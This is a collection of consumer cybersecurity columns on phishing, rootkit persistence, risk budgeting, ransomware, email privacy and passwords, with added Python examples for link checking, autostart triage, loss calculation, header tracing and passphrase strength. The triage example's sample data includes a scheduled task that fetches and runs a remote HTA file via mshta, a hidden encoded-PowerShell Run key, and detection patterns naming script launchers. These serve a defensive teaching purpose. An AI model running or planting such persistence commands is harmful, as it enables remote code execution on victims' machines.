Gone Phishin’

Happy to Help: An entry-level accountant, “Sebastian”, receives an email from his CEO. Sebastian is excited that the CEO recognizes him and needs his help on a major acquisition. The CEO asks that 50 million euros be wired immediately to a bank account for the acquisition. Sebastian quickly executes the transfer. He feels like a hero. He can almost smell that promotion.

Oops: Unfortunately for Sebastian and his employer, the large Austrian aerospace company FACC, the email was not from his CEO. This kind of attack, in which a criminal impersonates an executive to get an employee to send money, is known as CEO fraud or business email compromise (BEC), and this was one of the most profitable phishing expeditions ever. The company recovered only about 20% of the funds. The CEO was fired, and most likely Sebastian was too.

Phishing: Phishing is a type of cyber-attack that uses email (and, increasingly, text messages and phone calls) to trick the recipient into taking some action or providing private information. The term dates from the mid-1990s as a variant of “fishing” and refers to the “bait” used to get the victim to “bite.” There are several variations. Spear phishing targets a specific individual or group, such as the employees of one company, members of a certain profession, or military personnel; it is more convincing because the attacker has done some research on the target first. Whaling is spear phishing aimed at high-level personnel, such as executives, who can authorize large payments.

More Complex Today: With the techniques used today, it is not always simple to identify a phishing attack. The Nigerian prince scam, with its poor grammar and misspelled words, is still around, but newer lures are polished, copy the logos and wording of real organizations, and are often sent from an address that differs from the legitimate one by a single character, or from a legitimate account that has itself been compromised.

What to Watch For: Here are some methods to skillfully spot the phishing email. If an email asks for personal information or asks you to verify details like bank or credit card information, don’t take the bait. Legitimate organizations do not ask you to confirm passwords, account numbers or card details by email. Be cautious of emails presenting dire warnings and consequences that require urgent action, such as a warning that an account of yours has expired or has been hacked, and be equally wary of an urgent deadline attached to those consequences; the urgency is there to stop you from thinking. Another common tactic is to offer a large financial reward: a lottery you did not enter, or prize money from a bogus contest. If it sounds too good to be true, it probably is. In a business, watch especially for requests that break the normal process: a payment to a new bank account, a request to keep the matter confidential, or a sender who is suddenly reachable only by email.

What Next?: Now that you are starting to smell something phishy, what do you do? First, don’t click on the provided link, if there is one. Hover over the link and look at the bottom left corner of your browser or email client, where the full web address is shown. Compare the address the link displays with the address it actually goes to; on a phishing email they are often different. Look-alike addresses add extra words to the real name (paypal-secure-login.com is not paypal.com) or swap characters (g00gle is not the same as google), so scrutinize the part of the address just before the first slash. Be wary of shortened URLs (bit.ly, tinyurl.com and the like): a shortener hides the true destination until you click. When you get an email that seems to have come from your bank, mentioning a dire consequence and an urgent deadline, call the bank using a number YOU KNOW is good, or type the bank’s address into your browser yourself; do not use the phone number or the link in the email to decide whether the email is legitimate. Many spear phishing attacks, including the one that hit FACC, are thwarted by a policy requiring a second, out-of-band approval (a phone call to a known number, or a second signer) before any payment requested by email is sent. That second approval is what Sebastian should have looked for.
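The checks above can be automated. As an added example (not code from the Cyber Tripwire column), the Python below pulls every link out of an HTML email body and flags the three tells just discussed: a link whose visible text shows one address while the href goes to another, a link-shortener host, and a look-alike domain that substitutes digits for letters or borrows a brand name. The shortener list, the brand list and the sample message are constructed for the example; the registered_domain() helper keeps only the last two labels, which is enough for .com addresses but is not a substitute for a real public-suffix list.

```python
"""Flag common phishing tells in the links of an HTML email body (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: a starter list of link-shortening hosts; extend it for your environment.
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly", "is.gd"}

# Constructed list of brands worth protecting; a real deployment would use the
# organisation's own banks, vendors and partners.
PROTECTED_BRANDS = {"google.com", "paypal.com", "microsoft.com"}

# Digits and symbols that phishers swap for letters (g00gle, micr0soft, paypa1).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a"})


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Last two labels of a host name (www.g00gle.com -> g00gle.com).
    Good enough for .com; production code should use the public-suffix list."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def inspect_links(html):
    """Return [(href, reason)] for every link that shows a phishing tell."""
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        host = urlparse(href).hostname or ""
        domain = registered_domain(host)

        if domain in SHORTENER_HOSTS:
            findings.append((href, "shortened URL hides the real destination"))

        # The visible text is itself a URL, but the href goes somewhere else.
        shown = re.search(r"https?://([^/\s]+)", text)
        if shown and registered_domain(shown.group(1)) != domain:
            findings.append((href, f"text shows {shown.group(1)} but link goes to {host}"))

        for brand in PROTECTED_BRANDS:
            if domain == brand:
                continue
            if domain.translate(HOMOGLYPHS) == brand:
                findings.append((href, f"{domain} is a look-alike of {brand}"))
            elif brand.split(".")[0] in domain.split(".")[0]:
                findings.append((href, f"{domain} borrows the name of {brand}"))
    return findings


# Constructed sample of the kind of message the column describes.
SAMPLE_EMAIL = """
<p>Your account will be suspended. Verify your details within 24 hours.</p>
<a href="http://www.g00gle.com/verify">https://www.google.com/verify</a><br>
<a href="http://bit.ly/3xAbCd">Click here to restore access</a><br>
<a href="https://paypal-secure-login.com/login">Secure login</a><br>
<a href="https://www.google.com/support">Help center</a>
"""

if __name__ == "__main__":
    for link, reason in inspect_links(SAMPLE_EMAIL):
        print(f"{reason}: {link}")
```

Run against the sample, the first link is reported twice (text/href mismatch and digit substitution), the bit.ly link once, the paypal look-alike once, and the genuine google.com link not at all. The same logic belongs in a mail gateway or a user "report phishing" workflow rather than in each reader's head.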

Protection: To protect your business, you should look at increasing your cyber defenses. Use an email service with spam and phishing filtering, and publish SPF, DKIM and DMARC records for your domain so that receiving mail servers can reject messages that forge your address. Businesses can also use email certificates (S/MIME) to digitally sign outgoing messages so recipients can verify they came from you.

The Keys: Training and awareness are the key. There are services you can leverage that provide phishing training. It’s even better if the training also includes simulated phishing attempts targeting your employees, so you can measure how well the training is sinking in, and a simple way for employees to report a suspicious email rather than quietly deleting it.

Perhaps if “Sebastian” from FACC had the proper training, he might still be enjoying his employment there – along with his CEO. 

On A Hot Day

Not The Droids You’re Looking For: On a hot day (which was not unusual for the desert planet of Tatooine), overlooking the Mos Eisley space port, the Jedi master warned his freshly-minted apprentice to be careful, with good reason. No sooner had they hovered into town in the weathered X-34 than they were stopped at an impromptu checkpoint. The gleaming troopers searching for stolen imperial plans demanded to see identification. Waving his aged fingers, the holy man muttered, “You don’t need to see his identification.” In a perplexing turn of events, the menacing guard robotically repeated those words, thereby blasting that exchange into galactic popular culture.

Cyber Jedi Mind Tricks: You may compare your computer to the weak-minded fools vulnerable to a Jedi mind trick: it does what it is programmed to do. Nothing more. For example, when the operating system or an antivirus scanner looks for files (say, when it hunts for malware), it does so in a methodical manner, asking the operating system to list directories and open files. Malware authors know how this is done. A rootkit inserts itself into that process and edits the answers, so that its own files, processes and registry keys never show up in the list while its secret plans sit deep in the file system. Malware also makes sure it survives a reboot: it may add registry Run keys, install additional user accounts, and set up scheduled tasks or services that start it again.
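As an added example (not the column’s own code), the Python below performs the systematic check described here on two of the hiding places just named: the HKCU Run key, as exported by `reg export`, and the task list from `schtasks /query /fo csv /v`. Both inputs here are constructed samples, and the heuristics (binaries launched from AppData, Temp or ProgramData, encoded or hidden PowerShell, script-host launchers such as mshta and rundll32) are a starting point, not a verdict. A clean result does not prove the machine is clean, which is the point the rest of this piece makes.

```python
"""Triage Windows autostart locations from exported text (added example)."""
import csv
import io
import re

# Starter heuristics an analyst would apply (assumptions, not an exhaustive list).
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\\AppData\\(Local|Roaming)\\", re.I), "runs from the user profile"),
    (re.compile(r"\\Temp\\", re.I), "runs from a temp directory"),
    (re.compile(r"\\ProgramData\\", re.I), "runs from ProgramData"),
    (re.compile(r"powershell.*?\s-(e|enc|encodedcommand)\b", re.I), "encoded PowerShell"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\b(mshta|wscript|cscript|regsvr32|rundll32)\b", re.I), "script/LOLBin launcher"),
]


def classify(command):
    """Return the reasons a command line looks suspicious (empty list if none)."""
    return [reason for pattern, reason in SUSPICIOUS_PATTERNS if pattern.search(command)]


# One value line of a .reg file: "Name"="data"
REG_VALUE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')


def triage_run_key(reg_text):
    """Parse a .reg export of a Run key; return suspicious (name, command, reasons) tuples."""
    hits = []
    for line in reg_text.splitlines():
        m = REG_VALUE.match(line.strip())
        if not m:
            continue
        # .reg files escape backslashes and quotes; undo that before matching paths.
        command = m.group("value").replace("\\\\", "\\").replace('\\"', '"')
        reasons = classify(command)
        if reasons:
            hits.append((m.group("name"), command, reasons))
    return hits


def triage_tasks(csv_text):
    """Parse `schtasks /query /fo csv /v` output; return suspicious (task, command, reasons)."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["TaskName"] == "TaskName":  # schtasks /v repeats the header line between tasks
            continue
        command = row.get("Task To Run", "")
        reasons = classify(command)
        if reasons:
            hits.append((row["TaskName"], command, reasons))
    return hits


# Constructed sample exports; the encoded command is a placeholder, not real payload.
SAMPLE_RUN_KEY = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"WinUpdate"="C:\\Users\\sebastian\\AppData\\Local\\Temp\\svchost.exe"
"Helper"="powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
"""

SAMPLE_TASKS = r'''"HostName","TaskName","Status","Author","Task To Run"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$"
"WS01","\GoogleUpdateTaskMachineUA","Ready","","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler"
"HostName","TaskName","Status","Author","Task To Run"
"WS01","\Updater","Ready","WS01\sebastian","C:\ProgramData\update\svc.exe"
"WS01","\Sync","Ready","WS01\sebastian","mshta.exe http://198.51.100.7/a.hta"
'''

if __name__ == "__main__":
    for name, command, reasons in triage_run_key(SAMPLE_RUN_KEY) + triage_tasks(SAMPLE_TASKS):
        print(f"{name}: {command}\n    {', '.join(reasons)}")
```

On a suspect machine, run the two exports, copy the text to a clean machine and feed it to the functions there; a rootkit can lie to tools that run on the infected host, so the exports themselves are only as trustworthy as the system that produced them.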

Defender: According to several reputable sources, the Windows Defender component of Windows 10 (now called Microsoft Defender Antivirus) is all the antivirus most people need. It takes care of commodity malware, and it does so quietly: it quarantines what it finds automatically and shows only a brief notification, which is easy to miss. That’s good and bad. You won’t have a lot of alerts to investigate, which is good, but you may never notice that you were infected at all, which is bad. You want to know when you get infected so you can do something about it, so make a habit of checking Protection history in the Windows Security app, where Defender records every detection and the action it took.

Don’t Fall For It: You also need to be aware and avoid falling for the Jedi mind trick yourself. It may come to you in the form of a browser popup warning you that your computer is infected. It’s a lie. Don’t click anything in that window of warning. The red “x” in the upper right corner isn’t necessarily the close button; on a fake warning page, every part of that window can be the “install” button. Instead of clicking anywhere in that window, use the Windows Task Manager to find your browser instances and end the task on all of them. A real Defender alert comes from the Windows Security app, never from a web page.

If Infected: What do you do if your computer really does become infected with malware? Like the stormtroopers on Tatooine, you can systematically check the identification of every program and visit every mysterious dark hole within the Windows operating system; however, be aware there are Jedi that will prevent a successful search. The most reliable way to be sure you’ve deleted all the secret plans the malware left behind is to reinstall the operating system, then reinstall all the necessary programs. Just make sure you create a backup of all your irreplaceable files before you do, and scan that backup before restoring it, so you don’t bring the infection along.

Let’s just be clear: Malware wants to hide, and it’s very good at it. A knot of stormtroopers fitted with pure white armor briefly interrupted the Jedi concerning his mismatched metal companions at Mos Eisley. They were rebuffed. You will be rebuffed too if you think you can find every malicious secret plan embedded in your computer.

We Have A Problem

Risks While Fishing?: A few weeks ago, I was fishing in the White Mountains. Fishing, not catching, but that was ok. I was there to escape the steadily building heat of a Sierra Vista June, and to receive lessons in patience and perseverance. While the former was intended, the latter was an unwelcomed bonus. Everything was going according to plan. The weather was enviable. White puffy clouds cast occasional shadows that provided mild relief for a beleaguered amateur angler, and the pine scented air had an unexpected autumn crispiness. Then my fourth and last golden Acme Kastmaster snagged on a mossy rock in the middle of the East Fork of the Black River (which was more of a creek really). I had a choice to make. Retrieve the lure and try, try again; or snap the line and accept defeat.

Assess: I was alone on the river and miles from help. What if I slipped? A good friend slipped on a rock in THIS river; after facing THIS choice. The difference was he had a family to drive him the 30 minutes or so to Springerville for his fiberglass arm charm.

Choices: We all have to make choices every day. Maybe not this exact choice, but still choices that involve risk. Without even thinking, most of us can conduct risk assessments in real time. Risk is a function of probability, impact, and asset value. In the scenario I was facing, the probability of a fall was somewhat likely, the impact of a fall COULD have been high, and the asset was either my arm or my life. Again, high. A quick mental calculation, weighed against ending my fishing trip early, and I stepped solidly into the river. My worn leather ropers quickly filled with cool river water. I found sturdy footing and successfully rescued the remainder of my fishing excursion.

Business Risks: By now you’re asking me, “Tom, is this Field and Stream, or the Cyber Tripwire?” Stay with me. I’m getting to the point. On your business computer network, you have assets. I want you to calculate something. If you went into work today and found that none of your computers worked, what would be the monetary loss? What if it took a week to recover? Now, I’m no Dallin Haws, so you may want to check with him first. But here is a recommendation from Dr. Eric Cole, one of the leading cyber security experts in the country.

Calculating Risks: In calculating risk, two general formulas are used: SLE (single loss expectancy) and ALE (annualized loss expectancy). SLE is the starting point. With it you estimate the loss resulting from a single malicious incident. The asset value is what the asset is worth to the business, and the exposure factor is the fraction of that value lost in one incident (0.2 means one incident destroys 20% of the asset’s value). The formula for SLE is:

SLE = asset value x exposure factor

While the SLE is a valuable starting point, it only represents the loss for one incident. Since many organizations suffer the same loss multiple times a year (and others only once every few years), you have to include the ARO (annualized rate of occurrence), the expected number of incidents per year, which can be a fraction such as 0.25 for once every four years, and use them both to calculate the ALE:

ALE = SLE x ARO

The ALE is the yearly cost of carrying the risk. It is what you compare against the TCO (total cost of ownership) of a proposed solution: a control is worth buying when the ALE it removes is greater than what the control costs per year.

Your Cybersecurity Budget: So, this leads to the question. How much should you spend on cyber security prevention, detection, deterrence, and recovery? Calculate the ALE for the scenarios that matter to you, add them up, and treat that total as the ceiling: spend less than that annually, and spend it on the controls that remove the most ALE per dollar.
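Here is the arithmetic carried through, as an added example rather than Dr. Cole’s own worked figures. The scenario numbers (a $500,000 asset, a week-long outage that destroys 20% of its value, one such incident every four years) and the three candidate controls are constructed for the example; the functions implement the two formulas above and the comparison that decides the budget.

```python
"""SLE/ALE arithmetic and the cost/benefit test for a proposed control (added example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Scenario:
    """One threat against one asset, in the column's terms."""
    asset_value: float      # what the asset is worth to the business, in currency units
    exposure_factor: float  # fraction of that value lost in a single incident, 0.0 to 1.0
    aro: float              # annualized rate of occurrence: expected incidents per year


def sle(s):
    """Single loss expectancy = asset value x exposure factor."""
    return s.asset_value * s.exposure_factor


def ale(s):
    """Annualized loss expectancy = SLE x ARO."""
    return sle(s) * s.aro


def control_net_value(before, after, annual_cost):
    """Annual benefit of a control: the ALE it removes, minus its own yearly cost
    (licences, hardware, staff time). Positive means the control pays for itself."""
    return ale(before) - ale(after) - annual_cost


def choose_controls(before, candidates):
    """Rank candidate controls by net annual value; each candidate is
    (name, scenario_with_control, annual_cost). Returns [(name, net_value)], best first."""
    ranked = [(name, control_net_value(before, after, cost)) for name, after, cost in candidates]
    return sorted(ranked, key=lambda item: item[1], reverse=True)


# Constructed figures for a small office whose whole network is down for a week.
NO_CONTROLS = Scenario(asset_value=500_000, exposure_factor=0.20, aro=0.25)  # one bad week every 4 years

CANDIDATES = [
    # tested offline backups: the outage is much shorter (EF 0.05), same frequency
    ("offline backups", Scenario(500_000, 0.05, 0.25), 3_000),
    # backups plus endpoint protection and patching: shorter and rarer
    ("backups + EDR + patching", Scenario(500_000, 0.05, 0.10), 8_000),
    # a managed SOC that costs more per year than the risk it removes
    ("24x7 managed SOC", Scenario(500_000, 0.02, 0.05), 30_000),
]

if __name__ == "__main__":
    print(f"SLE = {sle(NO_CONTROLS):,.0f}   ALE = {ale(NO_CONTROLS):,.0f} per year")
    for name, value in choose_controls(NO_CONTROLS, CANDIDATES):
        print(f"{name:26s} net value {value:>10,.0f}/yr")
```

With these inputs the ALE is $25,000 a year, so that is the most the office should spend on this one scenario. The cheapest control comes out on top, the combined package is still clearly worth it, and the managed SOC has a negative net value: it would cost more each year than the entire risk it is meant to reduce. Change the constructed numbers to your own and the ranking may well flip, which is exactly why the calculation is worth doing.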

In retrospect, I probably should have cut bait on the river that day. The consequences could have been disastrous. But for your business, the consequences could be far worse if you remain in the dark regarding risk.

Riddled by Ransomware

Ransomware. The word sends chills up your spine; or it should. Ransomware is essentially a cyber-criminal holding your digital life hostage in a binary bag. The criminals do this by encrypting all your important, irreplaceable files with a key that only they hold (not a simple zip password: modern ransomware uses strong cryptography, and the files cannot be recovered without the key). The crooks “generously” offer to sell you the key for a “minor” fee. Truth is, the fee is not so minor, nor convenient, and paying does not guarantee you get a working decryptor.

How It’s Delivered: Most ransomware arrives as an email attachment or link, or infects you when you visit a compromised website; in businesses it also walks in through remote desktop services exposed to the Internet with weak passwords. For example, a few weeks ago, the actual website for the World Health Organization was compromised and was serving up malware to every visitor to the site!

Protection: You used to protect yourself from this type of attack by creating a daily backup of your critical files: Quickbooks, family photos, the digital scan of your high school diploma. I said keeping backups used to work. The crooks have changed their tactics. As more of us got better at backing up our files, fewer of us paid the ransom, and we cut into their profits. That’s bad for business. (Backups are still essential; just keep a copy offline or otherwise disconnected, because ransomware also encrypts any backup drive or network share it can reach.)

Lockout or Stealing: Before, they just stole your access to the files by encrypting them. Now they also steal copies of the files first, a tactic known as double extortion. If you don’t pay up, they will dump your files on the dark web–not to the highest bidder–but for free. Maybe you’re not concerned if your pictures of Fluffy end up in the darkest corners of the Internet, but how about your Quickbooks, or the scans of your birth certificate, social security card and driver’s license? It is not uncommon (nor is it recommended) for people to keep spreadsheets of all their bank and investment account numbers and the associated usernames and passwords. These are certainly not the files you want to become public!

Anti-Virus Enough? I know what you’re thinking. “I have anti-virus so I don’t have to worry, right?” Wrong. Your antivirus won’t stop all of it. If it reliably could, you’d rarely hear about these attacks in the news. Antivirus recognizes malware it has seen before, and ransomware crews rebuild their tools constantly to stay ahead of it. Don’t delete it though; it still stops a great deal of malware.

Two Keys: It is imperative for every user to do two things. First, ensure you don’t surf the web or read email with an account that has administrator privileges; malware runs with the rights of the user who opened it. Second, become suspicious of EVERY email you receive; if your gut tells you an email looks “fishy”, then it is probably “phishy”. Additionally, if you receive an email whose tone is intended to terrify you with dire consequences for inaction, be on your guard. That is a favorite tactic of cyber-crooks.

Helpful Hint: One last suggestion. If you do store critical files like those I mentioned, then encrypt them yourself, for example by putting them in an archive protected with AES-256 (7-Zip offers this; the older “ZipCrypto” method built into many zip tools is weak) and an annoyingly long passphrase. Write the passphrase in a book and lock it in your desk drawer. If you follow this recommendation, it won’t matter if those files get dumped onto the dark web, because you have protected them. You turned the tables on the crooks: they will be unaware that the bag they hold is filled with digital dust. Encryption protects you from exposure, not from loss, so you still need the backup.

The Dangers of Unencrypted Email

Postcards from War: Recently, I was reading some of my grandfather’s faded postcards from World War I. I happened to read one in which he mentioned being released from quarantine: March 11, 1918, Fort Lewis, Washington – the Spanish Flu pandemic.

Then & Now: Postcards were how our grandparents sent brief messages over long distances. They are the antique analogs to modern email. The messages and attachments you send via email are every bit as private and secure as that dusty, old postcard.

Is This Normal: Recently, a close associate of mine, I’ll call him “John”, was required to take a defensive driving course. The business providing the service asked John to send a copy of his driver’s license. John promptly took a picture of his driver’s license in beautiful, high-definition color and attached it to an unsecure email. He didn’t even question it.

How It Works: Let’s look momentarily at a seemingly benign example to illustrate what happens when you hastily click the “send” button. Say you work for a medical practice and you send an email from your office to a patient. Here’s what happens:

  1. The email leaves your computer.
  2. It travels on your Internet Service Provider’s (ISP) network.
  3. It arrives at your mail server – a server you probably don’t control.
  4. Your hosted email provider then forwards a copy of the email to the patient’s mail server, probably webmail, like Gmail.
  5. A copy of the email languishes on the mail provider’s server.
  6. It then takes the last leg of the journey to land on the patient’s personal computer.

Everybody Sees It: At any of those points the email, like a postcard, can be read by anyone with access to the server it is sitting on and, if a hop between servers was not protected by TLS, by anyone watching the network in between. Most providers now use TLS between servers when the other side supports it, but it is negotiated hop by hop and is not guaranteed, and it does nothing for the copies that sit on disk at each end. That means if any of those computers storing a copy of the emails is compromised, so are the emails. All of them.
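You can see those hops for yourself in the message headers, because every mail server that handles a message prepends its own Received: line. The Python below, an added example and not part of the original column, reads a constructed message that follows steps 1 through 4 above (workstation, ISP relay, the practice’s hosted mail server, the patient’s webmail provider) and lists each hop along with whether that hop used TLS, which RFC 3848 records with the keyword ESMTPS rather than ESMTP. Host names and addresses are from the reserved documentation ranges and are not real systems.

```python
"""List the servers that handled an email, from its Received: headers (added example)."""
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# Each relay prepends its own Received: line, so the top one is the last hop.
HOP = re.compile(r"from\s+(?P<frm>\S+).*?\bby\s+(?P<by>\S+).*?\bwith\s+(?P<proto>\S+)", re.S)

# RFC 3848 / RFC 6531 'with' keywords that mean the hop was protected by TLS.
TLS_KEYWORDS = {"ESMTPS", "ESMTPSA", "UTF8SMTPS", "UTF8SMTPSA"}


def trace_hops(raw_message):
    """Return hops in the order they happened: [(from_host, by_host, protocol, time, tls)]."""
    msg = message_from_string(raw_message)
    hops = []
    for header in reversed(msg.get_all("Received") or []):
        m = HOP.search(header)
        if not m:
            continue  # a relay using a non-standard format; skip rather than guess
        when = parsedate_to_datetime(header.rsplit(";", 1)[-1].strip())
        proto = m.group("proto").upper()
        hops.append((m.group("frm"), m.group("by"), proto, when, proto in TLS_KEYWORDS))
    return hops


def unencrypted_hops(raw_message):
    """The legs on which the message travelled in the clear, like a postcard."""
    return [(frm, by) for frm, by, _, _, tls in trace_hops(raw_message) if not tls]


# Constructed message: front-desk PC -> ISP relay -> hosted mail server -> patient's webmail.
SAMPLE_MESSAGE = """\
Received: from mail.hostedmail.example (mail.hostedmail.example [203.0.113.25])
        by mx.webmail.example with ESMTPS id q7si2
        for <patient@webmail.example>; Tue, 03 Mar 2020 09:15:12 -0700
Received: from smtp.isp.example (smtp.isp.example [198.51.100.9])
        by mail.hostedmail.example with ESMTP id 3f8a1
        for <patient@webmail.example>; Tue, 03 Mar 2020 09:15:10 -0700
Received: from FRONTDESK-PC (c-192-0-2-44.isp.example [192.0.2.44])
        by smtp.isp.example with ESMTP id 88d2
        for <patient@webmail.example>; Tue, 03 Mar 2020 09:15:09 -0700
From: "Front Desk" <frontdesk@clinic.example>
To: patient@webmail.example
Subject: Your lab results
Date: Tue, 03 Mar 2020 09:15:09 -0700

Hello, your results are attached.
"""

if __name__ == "__main__":
    for frm, by, proto, when, tls in trace_hops(SAMPLE_MESSAGE):
        print(f"{when:%H:%M:%S}  {frm:28s} -> {by:26s} {proto:8s} {'TLS' if tls else 'CLEAR'}")
```

In this sample the first two legs ran in the clear and only the final delivery used TLS; the copies stored on the ISP relay, the hosted server and the webmail provider are readable regardless. Remember that Received: headers are written by the relays themselves, so only the lines added by servers you trust are reliable; a spammer can forge the lower ones.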

Unsecure By Design: Email is, by design, unsecure. That is why you should never (let me repeat, EVER) include any important, private information in any email, not just the protected health information (PHI) of patients. Unencrypted email is simply the wrong medium for transmitting sensitive data.

From the hhs.gov website:

Patients may initiate communications with a provider using e-mail. If this situation occurs, the health care provider can assume (unless the patient has explicitly stated otherwise) that e-mail communications are acceptable to the individual.

For Healthcare: Now, I’m not a HIPAA lawyer, and this is not legal advice, but basically, if you are a medical practice, you know that much of your communication with patients is over email. In fact, many prefer it. So as long as you warn the patient that your email communication is over unsecure media, and the patient acknowledges, then you may be absolved of the consequences of a PHI breach … maybe. You can even get patient acknowledgment with (ironically) a simple email waiver form that the patient signs and returns to your office, over email.

Secure Options: If you only send PHI through your Electronic Medical Record application’s own patient portal, it may take care of the encryption for you. If not, there are email providers that will encrypt your emails. Microsoft Office 365 offers message encryption in some of its tiers. Other providers, like ProtonMail, offer end-to-end encryption. A Chrome extension even exists that encrypts Gmail messages. It can be a little inconvenient, because you have to think up a strong password for each email and then deliver the password to your patient by calling or texting them (never in the same email). If you send sensitive data infrequently, the inconvenience is small. You decide whether you’d rather go through the effort or experience a breach.

You don’t have to protect sensitive data forever. Its value degrades over time. Conversely, that little postcard my grandfather hastily scrawled over 100 years ago is ever more precious to me. 

Passwords Are Like Dental Floss

Flossing is Hard: Passwords are the dental floss of the internet. They take precious time to use, everyone hates them, they cause mild discomfort, and the consequence of negligence could spell doom. Not immediate doom. But eventual, inevitable doom. Oh, and by the way, China knows your password! Your favorite one. The really complex one you made up 6 years ago that combines your sister’s phone number, your son’s birthday, and the exclamation point at the end. They also know your other favorite one. “Sweetie”.

Password Strength: Last week I gave you a tripwire you could use to foil a ransomware attacker with a strong password.  Continuing the theme, this week we discuss the importance of password hygiene.  Password hygiene involves the strength, uniqueness, and practices of passwords.

The Longer the Better: Compare password hygiene to dental floss hygiene: make them long, change them when there is reason to, and don’t share. When it comes to length, longer = stronger. In fact, length is more important than complexity. So instead of using a complex array of gibberish letters, numbers and symbols, the best practice is to create a passphrase. A passphrase is a list of unrelated common words. It is easier for you to remember and harder for a computer to crack. In the example from www.xkcd.com/936/, the password Tr0ub4dor&3 is difficult to remember but can be cracked in about 3 days, while four common unrelated words tied together like “correct horse battery staple” would take about 550 years. Both figures assume an attacker guessing at 1,000 tries per second against a login page; a criminal who has stolen a password database and cracks it offline can guess millions of times faster, which is exactly why every extra word matters.
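The numbers in the comic come from simple arithmetic, reproduced here as an added example (not from xkcd or the column). It assumes the comic’s rate of 1,000 guesses per second for an online attack against a web form and, as a separate assumption of this example, 10 billion guesses per second for an offline attack against a leaked database of fast-hashed passwords. The 32-word list is a toy for the generator and far too small for real use.

```python
"""Passphrase strength arithmetic behind the xkcd 936 numbers, plus a generator (added example)."""
import math
import secrets

SECONDS_PER_YEAR = 365 * 24 * 3600
ONLINE_RATE = 1_000             # the comic's assumption: guessing against a web login form
OFFLINE_RATE = 10_000_000_000   # assumed GPU rig against a leaked, fast-hashed database


def entropy_bits(choices_per_symbol, symbols):
    """Bits of entropy when each of `symbols` positions is drawn uniformly from `choices_per_symbol`."""
    return symbols * math.log2(choices_per_symbol)


def seconds_to_exhaust(bits, guesses_per_second):
    """Worst case for the attacker: try every possibility in the space."""
    return 2 ** bits / guesses_per_second


def years_to_exhaust(bits, guesses_per_second):
    return seconds_to_exhaust(bits, guesses_per_second) / SECONDS_PER_YEAR


def crack_time_table():
    """Years to exhaust each space at the online rate and at the assumed offline rate.
    The 28-bit figure for Tr0ub4dor&3 is the comic's own estimate for that pattern."""
    cases = {
        "Tr0ub4dor&3 (~28 bits)": 28,
        "4 common words, 2048-word list": entropy_bits(2048, 4),
        "6 words, 7776-word list": entropy_bits(7776, 6),
    }
    return {name: (years_to_exhaust(b, ONLINE_RATE), years_to_exhaust(b, OFFLINE_RATE))
            for name, b in cases.items()}


# Toy wordlist (constructed, 32 words = 5 bits each). Real passphrases need a large list
# such as the EFF long list (7776 words, about 12.9 bits per word).
TOY_WORDS = """apple brick cloud dance eagle fence grape house ivory jelly knife lemon
mango night ocean piano queen river stone tiger uncle vivid wagon xenon yacht zebra
anvil bloom crane delta ember frost""".split()
assert len(TOY_WORDS) == 32


def generate_passphrase(words=4, wordlist=TOY_WORDS):
    """Pick words with the OS cryptographic random source, never with random.choice."""
    return " ".join(secrets.choice(wordlist) for _ in range(words))


if __name__ == "__main__":
    for name, (online, offline) in crack_time_table().items():
        print(f"{name:32s} online: {online:12,.1f} yr   offline: {offline:14,.3f} yr")
    print("sample passphrase:", generate_passphrase(4))
```

The table reproduces the comic (about 3 days for Tr0ub4dor&3, about 558 years for four words) and then shows what the offline rate does to the same four words: the whole space is exhausted in under half an hour. Six words from a proper 7,776-word list push even that attack back to hundreds of thousands of years, which is why a password manager’s generated passphrases are longer than the comic’s example.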

Don’t Re-use Your Floss: You may ask, “If I create one strong passphrase, can I use it for all my accounts and be safe?” Well, not exactly. That’s where the second part of treat-passwords-like-dental-floss comes in: don’t share. Today you have so many accounts with passwords to remember: email, company login, bank, investment, social media, gaming … the list goes on. Major breaches like those at LinkedIn and Dropbox have exposed usernames (typically your email address) and passwords, and the information from these breaches eventually ends up on the dark web, available for any cyber-criminal to peruse. To see if your email address appears in a known breach, you can check it at www.haveibeenpwned.com. A trusted advisor can offer dark web checks for your business domains.

Try It Everywhere: When the hacker acquires your credentials, they test them against popular websites hoping you reused the password, an automated attack known as credential stuffing. Maybe you have a Wells Fargo or Merrill Lynch account with the same username and password. If they succeed, the consequences could be disastrous.

Password Managers: You may want to reconsider letting your browser manage your passwords. The saved-password feature of browsers is great for ease of use, for you and for a cyber-criminal. The browser does encrypt the stored passwords, but with a key that any program running under your Windows or Mac account can use, so malware that lands on your computer can read them all out in seconds; whole families of “infostealer” malware exist specifically to do that.

Consider the Consequences: Since there are so many long passwords to remember, a password manager can ease your password woes. A password manager can create, encrypt, store, and autofill your passwords for multiple accounts, making it harder for hackers to get them. Some recommended free managers are Apple Keychain, Bitwarden and KeePass. You may hate to floss. You may hate password hygiene. But until there is something better, consider the consequences.